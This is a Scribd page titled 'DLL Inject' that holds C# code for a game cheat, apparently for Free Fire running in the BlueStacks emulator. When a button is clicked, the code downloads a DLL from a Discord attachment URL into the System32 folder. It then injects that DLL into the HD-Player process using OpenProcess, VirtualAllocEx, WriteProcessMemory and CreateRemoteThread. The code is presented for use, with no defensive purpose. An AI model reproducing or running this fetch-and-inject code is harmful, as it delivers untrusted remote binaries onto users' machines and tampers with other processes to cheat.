Scribd
Upload
6 views2 pages

DLL Inject

chams ff

Uploaded by

bosstergame23
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
6 views2 pages

DLL Inject

chams ff

Uploaded by

bosstergame23
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

[DllImport("kernel32.

dll")]
public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle,
int dwProcessId);
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError
= true)]
static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr
lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter,
uint dwCreationFlags, IntPtr lpThreadId);
const int PROCESS_CREATE_THREAD = 0x0002;
const int PROCESS_QUERY_INFORMATION = 0x0400;
const int PROCESS_VM_OPERATION = 0x0008;
const int PROCESS_VM_WRITE = 0x0020;
const int PROCESS_VM_READ = 0x0010;
const uint MEM_COMMIT = 0x00001000;
const uint MEM_RESERVE = 0x00002000;
const uint PAGE_READWRITE = 4;
private void guna2Button2_Click(object sender, EventArgs e)
{
string fileName = "C:\\Windows\\System32\\ZeroxVip.dll";
ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
string adress =
"https://cdn.discordapp.com/attachments/1236909298626596884/1237303641812107264/
ZeroxVip.dll?
ex=6650e910&is=664f9790&hm=76acc9321ffe36a180a8816dc05254eed815c6a28ea0df59995403be
f0a80365&";
bool flag = File.Exists(fileName);
if (flag)
{
File.Delete(fileName);
}
this.webclient.DownloadFile(adress, fileName);
Process targetProcess = Process.GetProcessesByName("HD-Player")[0];
IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD |
PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE |
PROCESS_VM_READ, false, targetProcess.Id);
IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"),
"LoadLibraryA");
string dllName = "ZeroxVip.dll";
IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)
((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
UIntPtr bytesWritten;
WriteProcessMemory(procHandle, allocMemAddress,
Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) *
Marshal.SizeOf(typeof(char))), out bytesWritten);
CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr,
allocMemAddress, 0, IntPtr.Zero);
}
private WebClient webclient = new WebClient();
@here

You might also like